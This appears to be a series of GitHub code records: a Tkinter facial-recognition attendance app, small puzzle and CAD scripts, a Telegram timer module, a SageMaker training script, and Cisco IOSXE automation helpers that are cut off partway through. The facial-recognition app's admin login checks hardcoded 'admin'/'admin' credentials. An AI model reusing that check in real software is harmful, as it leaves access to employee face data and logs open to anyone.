30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#64AFFF\",fg_color=\"#109945\")\r\n self.logout_button_main_window.place(x=760, y=180)\r\n self.face_descriptor=0\r\n \r\n\r\n self.register_new_user_button_main_window = customtkinter.CTkButton(master=self.main_window, text=\"Admin\", command=self.checkadmin,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#2e2e2e\")\r\n self.register_new_user_button_main_window.place(x=760, y=430)\r\n self.webcam_label = util.get_img_label(self.main_window)\r\n self.webcam_label.place(x=30, y=90, width=640, height=400)\r\n\r\n self.add_webcam(self.webcam_label)\r\n \r\n def reg(self):\r\n self.main_window.destroy()\r\n self.adminmain_window= tk.Toplevel(self.first_window)\r\n self.adminimage_path = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/reg.png\"\r\n self.adminmain_window.geometry(\"1100x600+350+100\")\r\n self.adminmain_window.resizable(width=False,height=False)\r\n self.adminimage = PhotoImage(file=self.adminimage_path)\r\n self.adminimage_label = tk.Label(self.adminmain_window, image=self.adminimage)\r\n self.adminimage_label.pack()\r\n self.adminimage_label.place(x=0, y=0, width=1100, height=600)\r\n self.adminwebcam_label = util.get_img_label(self.adminmain_window)\r\n self.adminwebcam_label.place(x=30, y=90, width=640, height=400)\r\n self.add_webcam (self.adminwebcam_label)\r\n self.accept_button_register_new_user_window = customtkinter.CTkButton(master=self.adminmain_window, text=\"Register\", command=self.accept_register_new_user,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#64AFFF\",fg_color=\"#109945\")\r\n self.accept_button_register_new_user_window.place(x=775, y=370)\r\n \r\n\r\n self.name=customtkinter.CTkEntry(self.adminmain_window,width=340, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\")\r\n self.name.place(x=730, y=190)\r\n\r\n self.empid=customtkinter.CTkEntry(self.adminmain_window,width=340, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\")\r\n self.empid.place(x=730, y=280)\r\n\r\n def captureface(self,username,empid):\r\n if self.flag==True:\r\n self.c.execute(\"SELECT rowid FROM users WHERE id = ?\", (empid,))\r\n self.db_result=self.c.fetchone()\r\n if (self.db_result is None): \r\n ret, frame = self.cap.read()\r\n self.current_time = datetime.datetime.now()\r\n self.most_recent_capture_arr = frame\r\n while True:\r\n \r\n self.gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n \r\n self.dets = self.face_detector(self.gray, 1)\r\n if len(self.dets) == 1:\r\n self.shape = self.shape_predictor(self.gray, self.dets[0])\r\n self.face_descriptor = self.face_recognizer.compute_face_descriptor(frame, self.shape)\r\n self.face_descriptor_str = ','.join(str(e) for e in self.face_descriptor)\r\n\r\n self.c.execute(\"INSERT INTO users (id,username, face_descriptor) VALUES (?,?, ?)\", (empid,username, self.face_descriptor_str))\r\n self.conn.commit()\r\n \r\n messagebox.showinfo(\"Success\", \"Face captured successfully!\",parent= self.adminmain_window)\r\n\r\n self.adminmain_window.destroy()\r\n return\r\n else:\r\n messagebox.showinfo(\"Error\",\"EmpID already exists\",parent= self.adminmain_window)\r\n return\r\n else:\r\n messagebox.showinfo(\"Error\",\"Please fix lighting or position of 
face, till rectangle around face is visible\",parent= self.adminmain_window)\r\n def add_webcam(self, label):\r\n\r\n if 'cap' not in self.__dict__:\r\n self.cap = cv2.VideoCapture(0)\r\n\r\n self._label = label\r\n self.process_webcam()\r\n \r\n def process_webcam(self):\r\n \r\n ret, frame = self.cap.read()\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n self.most_recent_capture_arr = frame\r\n img_ = cv2.cvtColor(self.most_recent_capture_arr, cv2.COLOR_BGR2RGB)\r\n self.most_recent_capture_pil = Image.fromarray(img_)\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n self._label.imgtk = imgtk\r\n self._label.configure(image=imgtk)\r\n self.flag=False\r\n faces = self.faceCascade.detectMultiScale(\r\n gray,\r\n scaleFactor=1.1,\r\n minNeighbors=5,\r\n minSize=(200, 200),\r\n flags=cv2.CASCADE_SCALE_IMAGE\r\n \r\n )\r\n\r\n # Draw a rectangle around the faces\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 128, 0), 3)\r\n self.roi_gray = gray[y:y+h, x:x+w]\r\n self.roi_color = frame[y:y+h, x:x+w]\r\n cv2.putText(frame,'PROCEED',(x, y-6), self.font, 2,(255,0, 0),2)\r\n img_ = cv2.cvtColor(self.most_recent_capture_arr, cv2.COLOR_BGR2RGB)\r\n self.most_recent_capture_pil = Image.fromarray(img_)\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n self._label.imgtk = imgtk\r\n self._label.configure(image=imgtk)\r\n self.flag=True\r\n self._label.after(20, self.process_webcam)\r\n\r\n def checkadmin(self):\r\n\r\n self.checkadmin_newwindow= tk.Toplevel(self.first_window)\r\n self.checkadmin_newwindow.geometry(\"1100x600+350+100\")\r\n self.image_path1 = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/logo3.png\" \r\n self.image1 = PhotoImage(file=self.image_path1)\r\n self.image_label1 = tk.Label(self.checkadmin_newwindow, image=self.image1)\r\n self.image_label1.pack()\r\n self.image_label1.place(x=0, y=0, width=1100, height=600)\r\n \r\n self.adminusername = customtkinter.CTkEntry(self.checkadmin_newwindow,width=380, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\")\r\n self.adminusername.place(x=368, y=260)\r\n \r\n\r\n self.adminpass = customtkinter.CTkEntry(self.checkadmin_newwindow,width=380, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\",show=\"*\")\r\n self.adminpass.place(x=368, y=335)\r\n\r\n self.accept_button_admincheck = customtkinter.CTkButton(master=self.checkadmin_newwindow, text=\"Login\", command=self.check,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.accept_button_admincheck.place(x=415, y=410)\r\n \r\n \r\n def check(self):\r\n \r\n if self.adminusername.get()==\"admin\" and self.adminpass.get()==\"admin\":\r\n self.admin() \r\n else:\r\n util.msg_box('Error', 'Wrong Username or Password')\r\n \r\n\r\n def admin(self):\r\n \r\n self.admin_newwindow= tk.Toplevel(self.first_window)\r\n self.admin_newwindow.geometry(\"1100x600+350+100\")\r\n self.image_path2 = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/logo4.png\" \r\n self.image2 = PhotoImage(file=self.image_path2)\r\n self.image_label2 = tk.Label(self.admin_newwindow, image=self.image2)\r\n self.image_label2.pack()\r\n self.image_label2.place(x=0, y=0, width=1100, height=600)\r\n self.accept_button_admin_newwindow = 
customtkinter.CTkButton(master=self.admin_newwindow, text=\"Register New User\", command=self.reg,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n        self.accept_button_admin_newwindow.place(x=400, y=105)\r\n        self.logs_window = customtkinter.CTkButton(master=self.admin_newwindow, text=\"Download Logs\", command=self.log_window,height=50,width=285,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n        self.logs_window.place(x=400, y=245)\r\n        self.deluser_window=customtkinter.CTkButton(master=self.admin_newwindow, text=\"Remove Employee\", command=self.deluser,height=50,width=285,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n        self.deluser_window.place(x=400, y=395)\r\n\r\n    def deluser(self):\r\n        self.checkadmin_newwindow.destroy()\r\n        self.deleteuserwindow=tk.Toplevel(self.first_window)\r\n        self.deleteuserwindow.geometry(\"1100x600+350+100\")\r\n        self.image_path3 = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/del.png\" \r\n        self.image3 = PhotoImage(file=self.image_path3)\r\n        self.image_label3 = tk.Label(self.deleteuserwindow, image=self.image3)\r\n        self.image_label3.pack()\r\n        self.image_label3.place(x=0, y=0, width=1100, height=600)\r\n        self.delusername = customtkinter.CTkEntry(self.deleteuserwindow,width=380, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\")\r\n        self.delusername.place(x=380, y=265)\r\n        self.accept_button_delete = customtkinter.CTkButton(master=self.deleteuserwindow, text=\"Delete\", command=self.delete,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n        self.accept_button_delete.place(x=415, y=415)\r\n    \r\n    def delete(self):\r\n        self.main_window.destroy()\r\n        self.c.execute(\"SELECT rowid FROM users WHERE id = ?\", (self.delusername.get(),))\r\n        self.del_result=self.c.fetchone()\r\n        if (self.del_result is None): \r\n            messagebox.showinfo(\"Error\",\"No such ID exists\",parent=self.deleteuserwindow)\r\n            return\r\n        else:\r\n            self.c.execute('DELETE FROM users WHERE id=?',(self.delusername.get(),))\r\n            self.conn.commit()\r\n            messagebox.showinfo(\"Success\",\"Record Deleted\")\r\n            self.deleteuserwindow.destroy()\r\n            self.admin_newwindow.destroy()\r\n\r\n    def login(self):\r\n        self.c.execute(\"SELECT username,id,face_descriptor FROM users\")\r\n        users = self.c.fetchall()\r\n        if not users:\r\n            messagebox.showinfo(\"Error\",\"No users registered\")\r\n        if self.flag==True:\r\n            ret, frame = self.cap.read()\r\n            self.current_time = datetime.datetime.now()\r\n            self.most_recent_capture_arr = frame\r\n            while True:\r\n                self.gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n                self.dets = self.face_detector(self.gray,1)\r\n                \r\n                while True:\r\n                    try:\r\n                        self.shape = self.shape_predictor(self.gray, self.dets[0])\r\n                        self.face_descriptor = self.face_recognizer.compute_face_descriptor(frame, self.shape)\r\n                        self.face_descriptor_str = ','.join(str(e) for e in self.face_descriptor)\r\n                        break\r\n                    except IndexError:\r\n                        break\r\n                    except AttributeError:\r\n                        break\r\n                for user in users:\r\n                    self.stored_face_descriptor = np.array([float(e) for e in user[2].split(',')])\r\n                    self.distance = np.linalg.norm(self.face_descriptor - self.stored_face_descriptor)\r\n                    if self.distance < 0.4: # Adjust this threshold based on your needs\r\n                        messagebox.showinfo(\"Success\", f\"Logged in as {user[0]} at {self.current_time}\",parent=self.main_window)\r\n                        \r\n                        formatted_date = self.current_time.strftime('%Y-%m-%d %H:%M:%S')\r\n                        self.d.execute(\"INSERT INTO logs (id,logintime_time) VALUES (?,?)\", (user[1],formatted_date))\r\n                        self.conn.commit()\r\n                        return\r\n                messagebox.showinfo(\"Error\", \"No valid face found\",parent=self.main_window) \r\n                return\r\n        else:\r\n            messagebox.showinfo(\"Error\",\"No valid face found\",parent=self.main_window)\r\n        \r\n\r\n    def logout(self):\r\n        self.c.execute(\"SELECT username,id,face_descriptor FROM users\")\r\n        users = self.c.fetchall()\r\n        if not users:\r\n            messagebox.showinfo(\"Error\",\"No users registered\",parent=self.main_window)\r\n        if self.flag==True:\r\n            ret, frame = self.cap.read()\r\n            self.current_time = datetime.datetime.now()\r\n            self.most_recent_capture_arr = frame\r\n            while True:\r\n                self.gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n                self.dets = self.face_detector(self.gray,1)\r\n                while True:\r\n                    try:\r\n                        self.shape = self.shape_predictor(self.gray, self.dets[0])\r\n                        self.face_descriptor = self.face_recognizer.compute_face_descriptor(frame, self.shape)\r\n                        self.face_descriptor_str = ','.join(str(e) for e in self.face_descriptor)\r\n                        break\r\n                    except IndexError:\r\n                        break\r\n                    except AttributeError:\r\n                        break\r\n                \r\n                self.c.execute(\"SELECT username,id,face_descriptor FROM users\")\r\n                users = self.c.fetchall()\r\n                \r\n                for user in users:\r\n                    self.stored_face_descriptor = np.array([float(e) for e in user[2].split(',')])\r\n                    self.distance = np.linalg.norm(self.face_descriptor - self.stored_face_descriptor)\r\n                    if self.distance < 0.4: # Adjust this threshold based on your needs\r\n                        messagebox.showinfo(\"Success\", f\"Logged out as {user[0]} at {self.current_time}\",parent=self.main_window)\r\n                        formatted_date = self.current_time.strftime('%Y-%m-%d %H:%M:%S')\r\n                        \r\n                        self.d.execute(\"INSERT INTO logs (id,logouttime_time) VALUES (?,?)\", (user[1],formatted_date))\r\n                        self.conn.commit()\r\n                        return\r\n                return\r\n        else:\r\n            messagebox.showinfo(\"Error\",\"No valid face found\",parent=self.main_window)\r\n    def add_img_to_label(self, label):\r\n\r\n        imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n        label.imgtk = imgtk\r\n        label.configure(image=imgtk)\r\n\r\n        self.register_new_user_capture = self.most_recent_capture_arr.copy()\r\n\r\n    def start(self):\r\n\r\n        self.first_window.mainloop()\r\n\r\n    def accept_register_new_user(self):\r\n\r\n        self.captureface(self.name.get(),self.empid.get())\r\n        self.checkadmin_newwindow.destroy()\r\n        self.admin_newwindow.destroy()\r\n    def try_again_register_new_user(self):\r\n\r\n        self.adminmain_window.destroy()\r\n\r\n    def logs(self):\r\n\r\n        query = \"SELECT * FROM logs\"\r\n        df = pd.read_sql(query, self.conn)\r\n        df.to_excel(\"C:/Users/akash/Desktop/data/logs.xlsx\")\r\n        messagebox.showinfo(\"Success\",\"Logs exported\")\r\n        self.checkadmin_newwindow.destroy()\r\n        self.admin_newwindow.destroy()\r\n        self.main_window.destroy()\r\n    \r\n    def user(self):\r\n        query = \"SELECT id,username FROM users\"\r\n        df = pd.read_sql(query, self.conn)\r\n        df.to_excel(\"C:/Users/akash/Desktop/data/users.xlsx\")\r\n        messagebox.showinfo(\"Success\",\"Users exported\")\r\n        self.checkadmin_newwindow.destroy()\r\n        self.admin_newwindow.destroy()\r\n    def log_window(self):\r\n        \r\n        self.log_newwindow= tk.Toplevel(self.first_window)\r\n        
self.log_newwindow.geometry(\"1100x600+350+100\")\r\n self.image_pathl = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/logs.png\" \r\n self.imagel = PhotoImage(file=self.image_pathl)\r\n self.image_labell = tk.Label(self.log_newwindow, image=self.imagel)\r\n self.image_labell.pack()\r\n self.image_labell.place(x=0, y=0, width=1100, height=600)\r\n self.accept_button_log_newwindow = customtkinter.CTkButton(master=self.log_newwindow, text=\"Download Login/Logout Info\", command=self.logs,height=50,width=325,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.accept_button_log_newwindow.place(x=330, y=205)\r\n self.logs_window = customtkinter.CTkButton(master=self.log_newwindow, text=\"Download Users\", command=self.user,height=50,width=325,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.logs_window.place(x=380, y=345)\r\n \r\nif __name__ == \"__main__\":\r\n app = App()\r\n app.start()\r\n ","repo_name":"aks32003/FacialRecognition","sub_path":"mainproject.py","file_name":"mainproject.py","file_ext":"py","file_size_in_byte":20993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
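The login/logout flow in the record above reduces to one core operation: compute a 128-dimensional dlib face descriptor for the current frame and compare it against each stored descriptor by Euclidean distance, accepting a match under a threshold (0.4 in the record; dlib's documentation commonly cites 0.6). A minimal sketch of just that matching step, with hypothetical enrolled data standing in for the SQLite rows:

import numpy as np

def best_match(descriptor, known, threshold=0.4):
    """Return (name, distance) of the closest enrolled user under threshold, else None."""
    best = None
    for name, stored in known.items():
        dist = np.linalg.norm(np.asarray(descriptor) - np.asarray(stored))
        if dist < threshold and (best is None or dist < best[1]):
            best = (name, dist)
    return best

# hypothetical enrolled users: name -> 128-dim descriptor (random here; real ones
# would come from dlib's compute_face_descriptor, as in the record)
known = {"alice": np.random.rand(128), "bob": np.random.rand(128)}
print(best_match(np.random.rand(128), known))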
+{"seq_id":"3303005108","text":"def put_bomb():\r\n global I, J, mat, t\r\n for i in range(I):\r\n for j in range(J):\r\n if not mat[i][j]:\r\n mat[i][j] = t\r\n\r\ndef print_mat():\r\n global I, J, mat\r\n for i in range(I):\r\n for j in range(J):\r\n mat[i][j] = 'O' if mat[i][j] else '.'\r\n for l in mat:\r\n print(*l, sep=\"\")\r\n\r\ndef boom():\r\n global I, J, mat, t, boom_soon_list\r\n\r\n def boom_one(i, j):\r\n global I, J, mat\r\n for di, dj in ((0,0),(-1,0),(1,0),(0,1),(0,-1)):\r\n si, sj = i+di, j+dj\r\n if not (0<=siX\")\n .workplane()\n .circle(dims.bearing.inner.shaft_od / 2)\n .extrude(dims.bearing.inner.width)\n .faces(\"Z\")\n .workplane(centerOption=\"CenterOfMass\")\n .circle(dims.body.width / 2)\n .circle(leg.dims.id / 2)\n .cutBlind(-dims.body.leg_insertion)\n .faces(\">Z[-2]\")\n .tag(\"leg_mount_face\")\n .end()\n .center(0, 0)\n .hole(6, 10)\n)\n\nassy = cq.Assembly(body, name=\"body\", color=cq.Color(0.05, 0.05, 0.05))\nassy.add(bearing_outer, name=\"bearing_outer\", color=cq.Color(1.0, 0.99, 0.82))\nassy.add(bearing_inner, name=\"bearing_inner\", color=cq.Color(1.0, 0.99, 0.82))\nassy.constrain(\n \"bearing_outer@faces@>X\",\n \"body?bearing_inner_face\",\n \"Plane\",\n)\nassy.constrain(\n \"bearing_inner@faces@>X[1]\",\n \"bearing_outer@faces@>X[0]\",\n \"Plane\",\n)\nassy.solve()\n\nif \"show_object\" in locals():\n show_object(assy)\n","repo_name":"marcus7070/wheel-arch","sub_path":"leg_end.py","file_name":"leg_end.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"25791762795","text":"from .. import loader, utils\r\nfrom time import sleep\r\n\r\n\r\n\r\nclass TimerMod(loader.Module):\r\n \"\"\"Timer\"\"\" \r\n strings = {'name': 'Timer'} \r\n \r\n async def timercmd(self, event):\r\n \"\"\"Timer sec\"\"\"\r\n \r\n time = utils.get_args_raw(event)\r\n \r\n try:\r\n time = int(time)\r\n for i in range(time):\r\n await event.edit(str(time) + ' sec')\r\n sleep(1)\r\n time-=1\r\n await event.edit('Time is up!')\r\n\r\n\r\n except:\r\n await event.edit('Error: Invalid number')\r\n\r\n ","repo_name":"Yu-225/FTG-Modules","sub_path":"Timer.py","file_name":"Timer.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"24448215395","text":"import argparse\nimport os\nimport json\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\n\n\nif __name__ =='__main__':\n\n parser = argparse.ArgumentParser()\n\n # hyperparameters sent by the client are passed as command-line arguments to the script.\n parser.add_argument('--epochs', type=int, default=10)\n parser.add_argument('--gibberish', type=int, default=10)\n parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN'))\n parser.add_argument('--sm-model-dir', type=str, default=os.environ.get('SM_MODEL_DIR'))\n args, _ = parser.parse_known_args()\n \n print(args)\n \n model=tf.keras.models.Sequential()\n model.add(tf.keras.layers.Conv2D(filters=16,kernel_size=(3,3),activation='relu',input_shape=(128,128,3)))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n model.add(tf.keras.layers.Conv2D(filters=64,kernel_size=(3,3),activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n model.add(tf.keras.layers.Conv2D(filters=128,kernel_size=(3,3),activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n model.add(tf.keras.layers.Conv2D(filters=256,kernel_size=(2,2),activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n model.add(tf.keras.layers.Conv2D(filters=512,kernel_size=(2,2),activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n# model.add(tf.keras.layers.Conv2D(filters=1024,kernel_size=(3,3),activation='relu'))\n# model.add(tf.keras.layers.MaxPooling2D((2,2)))\n# model.add(tf.keras.layers.Dropout(0.5))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(100,activation='relu'))\n model.add(tf.keras.layers.Dropout(0.5))\n model.add(tf.keras.layers.Dense(2,activation='softmax'))\n print(model.summary())\n model.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n \n \n# model=tf.keras.models.Sequential()\n# model.add(tf.keras.applications.mobilenet_v2.MobileNetV2(include_top=False,pooling='avg',weights='imagenet',input_shape=(128,128,3)))\n# model.add(tf.keras.layers.Dropout(0.5))\n# model.add(tf.keras.layers.Dense(2,activation='softmax'))\n# model.layers[0].trainable= False\n# model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\n\n def get_train_data(location):\n print(location)\n# X = np.load(os.path.join(location, 'training.npz'))['xtrain']\n# y=np.load(os.path.join(location, 'training.npz'))['ytrain']\n datagen=tf.keras.preprocessing.image.ImageDataGenerator(samplewise_center=True,horizontal_flip=True,validation_split=0.3)\n datagen_train_flow_object=datagen.flow_from_directory(os.path.join(location, 'train'),target_size=(128,128),batch_size=12)\n return datagen_train_flow_object\n\n \n \n datagen_flow_object=get_train_data(args.train)\n# print(f'Xarray {X} type :{X.dtype} shape: {X.shape}')\n# print(f'Yarray {y} type :{y.dtype} shape: {y.shape}')\n r=model.fit_generator(datagen_flow_object,epochs=args.epochs)\n# print(model.weights)\n# model.save(os.path.join(args.sm_model_dir, '000000001'), 'my_model.h5')","repo_name":"abhijitshingote/aws_sagemaker_tensorflow","sub_path":"cats_dogs_sagemaker_train_script.py","file_name":"cats_dogs_sagemaker_train_script.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"19340125973","text":"from . import Indicator\n\n\nclass sma(Indicator):\n '''\n Non-weighted average of the last n periods\n\n Formula:\n - movav = Sum(data, period) / period\n\n See also:\n - http://en.wikipedia.org/wiki/Moving_average#Simple_moving_average\n '''\n group = 'overlap'\n alias = 'SMA', 'SimpleMovingAverage'\n outputs = 'sma'\n params = (\n ('period', 30, 'Period for the moving average calculation'),\n )\n\n def __init__(self):\n self.o.sma = self.i0.rolling(window=self.p.period).mean()\n","repo_name":"mementum/bta-lib","sub_path":"btalib/indicators/sma.py","file_name":"sma.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":424,"dataset":"github-code","pt":"94"}
+{"seq_id":"7459542000","text":"\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as f:\n long_description = f.read()\n\nsetup(\n name=\"avair.ai\",\n version=\"0.0.1\",\n description=\"Intelligent birdcam\",\n author=\"Jori van Lier\",\n long_description=long_description,\n author_email=\"jori@jvlanalytics.nl\",\n packages=[\"aviar\"],\n install_requires=[\n \"numpy>=1.18.0\",\n \"matplotlib>=3.2.0\",\n \"torch==1.4.0\",\n \"torchvision==0.5.0\",\n \"fastai==1.0.61\"\n ],\n extras_require={\n \"test\": {\n \"flake8\",\n \"pep8-naming\",\n \"pytest\"\n },\n },\n scripts=[\"daq_infer.py\"]\n)\n","repo_name":"jvanlier/aviar.ai","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"36114912252","text":"'''IOSXE execute functions for platform'''\n\n# Python\nimport logging\n\n# Genie\nfrom genie.harness.utils import connect_device\nfrom genie.utils.timeout import Timeout\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\n\n# Unicon\nfrom unicon.eal.dialogs import Statement, Dialog\nfrom unicon.core.errors import StateMachineError\n\n# Logger\n\nlog = logging.getLogger(__name__)\n\n\ndef execute_delete_boot_variable(device, boot_images, timeout=300):\n ''' Set the boot variables\n Args:\n device ('obj'): Device object\n boot_images ('str'): System image to delete as boot variable\n timeout ('int'): Max time to delete boot vars in seconds\n '''\n\n for image in boot_images:\n try:\n device.configure(\"no boot system {}\".format(image), timeout=timeout)\n except Exception as e:\n raise Exception(\"Failed to delete boot variables on '{}'\\n{}\".\\\n format(device.name, str(e)))\n else:\n log.info(\"Deleted '{}' from BOOT variable\".format(image))\n\n\ndef execute_set_boot_variable(device, boot_images, timeout=300):\n ''' Set the boot variables\n Args:\n device ('obj'): Device object\n boot_images ('str'): System image to set as boot variable\n timeout ('int'): Max time to set boot vars in seconds\n '''\n\n for image in boot_images:\n try:\n device.configure(\"boot system {}\".format(image), timeout=timeout)\n except Exception as e:\n raise Exception(\"Failed to set boot variables on '{}'\\n{}\".\\\n format(device.name, str(e)))\n else:\n log.info(\"Added '{}' to BOOT variable\".format(image))\n\n\ndef execute_set_config_register(device, config_register, timeout=300):\n '''Set config register to load image in boot variable\n Args:\n device ('obj'): Device object\n config_reg ('str'): Hexadecimal value to set the config register to\n timeout ('int'): Max time to set config-register in seconds\n '''\n\n try:\n device.configure(\"config-register {}\".format(config_register),\n timeout=timeout)\n except Exception as e:\n raise Exception(\"Failed to set config register for '{d}'\\n{e}\".\\\n format(d=device.name, e=str(e)))\n else:\n log.info(\"Set config-register to '{}'\".format(config_register))\n\n\ndef execute_write_erase(device, timeout=300):\n ''' Execute 'write erase' on the device\n Args:\n device ('obj'): Device object\n timeout ('int'): Max time to for write erase to complete in seconds\n '''\n\n log.info(\"Executing 'write erase' on the device\")\n\n # Unicon Statement/Dialog\n write_erase = Statement(\n pattern=r\".*remove all configuration files\\! Continue\\? 
\\[confirm\\]\",\n action='sendline()',\n loop_continue=True,\n continue_timer=False)\n\n # Add permisson denied to error pattern\n origin = list(device.execute.error_pattern)\n error_pattern = ['.*[Pp]ermission denied.*']\n error_pattern.extend(origin)\n\n try:\n output = device.execute(\"write erase\", reply=Dialog([write_erase]),\n timeout=timeout, error_pattern=error_pattern)\n except Exception as err:\n log.error(\"Failed to write erase: {err}\".format(err=err))\n raise Exception(err)\n finally:\n # restore original error pattern\n device.execute.error_pattern = origin\n\n if \"[OK]\" in output:\n log.info(\"Successfully executed 'write erase'\")\n else:\n raise Exception(\"Failed to execute 'write erase'\")\n\n\ndef execute_write_memory(device, timeout=300):\n ''' Execute 'write memory' on the device\n Args:\n device ('obj'): Device object\n timeout ('int'): Max time to for write memory to complete in seconds\n '''\n\n log.info(\"Executing 'write memory' on the device\")\n\n try:\n output = device.execute(\"write memory\", timeout=timeout)\n except Exception as err:\n log.error(\"Failed to execute 'write memory'\\n{err}\".format(err=err))\n raise Exception(err)\n\n if \"[OK]\" in output:\n log.info(\"Successfully executed 'write memory'\")\n else:\n raise Exception(\"Failed to execute 'write memory'\")\n\ndef execute_install_package(device, image_dir, image, save_system_config=True,\n timeout=660, _install=True):\n \"\"\" Installs package\n Args:\n device (\"obj\"): Device object\n image_dir (\"str\"): Directory image is located in\n image (\"str\"): Image name\n save_system_config (\"bool\"): If config changed do we save it?\n timeout (\"int\"): maximum time for install\n\n _install (\"bool\"): True to install, False to uninstall.\n Not meant to be changed manually.\n\n Raises:\n Exception\n\n Returns:\n True if install succeeded else False\n \"\"\"\n dialog = Dialog([\n Statement(pattern=r\".*Press Quit\\(q\\) to exit, you may save \"\n r\"configuration and re-enter the command\\. \"\n r\"\\[y\\/n\\/q\\]\",\n action='sendline(y)' if save_system_config else 'sendline(n)',\n loop_continue=True,\n continue_timer=False),\n Statement(pattern=r\".*This operation may require a reload of the \"\n r\"system\\. Do you want to proceed\\? 
\\[y\\/n\\]\",\n action='sendline(y)',\n loop_continue=True,\n continue_timer=False),\n Statement(pattern=r\"^.*RETURN to get started\",\n action='sendline()',\n loop_continue=False,\n continue_timer=False)\n ])\n\n if _install:\n cmd = \"\"\"install add file {dir}{image}\n install activate file {dir}{image}\"\"\".format(\n dir=image_dir, image=image\n )\n else:\n cmd = \"install deactivate file {dir}{image}\".format(\n dir=image_dir, image=image\n )\n\n try:\n device.execute(cmd, reply=dialog, timeout=timeout)\n except StateMachineError:\n # this will be raised after 'Return to get started' is seen\n device.destroy()\n timeout = Timeout(90, 30)\n while timeout.iterate():\n try:\n connect_device(device)\n except Exception:\n timeout.sleep()\n continue\n break\n else:\n raise Exception(\"Couldnt reconnect to the device\")\n\n if _install:\n cmd = \"install commit\"\n else:\n cmd = \"\"\"install commit\n install remove file {dir}{image}\"\"\".format(\n dir=image_dir, image=image\n )\n\n device.execute(cmd)\n\n try:\n out = device.parse(\"show install summary\")\n except SchemaEmptyParserError:\n out = {}\n\n for location in out.get(\"location\"):\n for pkg in out['location'][location]['pkg_state']:\n pkg = out['location'][location]['pkg_state'][pkg]\n if (_install and\n image in pkg['filename_version'] and\n 'C' == pkg['state']):\n # the image should exist; it was just installed\n return True\n elif (not _install and\n image in pkg['filename_version']):\n # the image should not exist; it was just uninstalled.\n return False\n\n return False if _install else True\n\ndef execute_uninstall_package(device, image_dir, image, save_system_config=True,\n timeout=660):\n \"\"\" Uninstalls package\n Args:\n device (\"obj\"): Device object\n image_dir (\"str\"): Directory image is located in\n image (\"str\"): Image name\n save_system_config (\"bool\"): If config changed do we 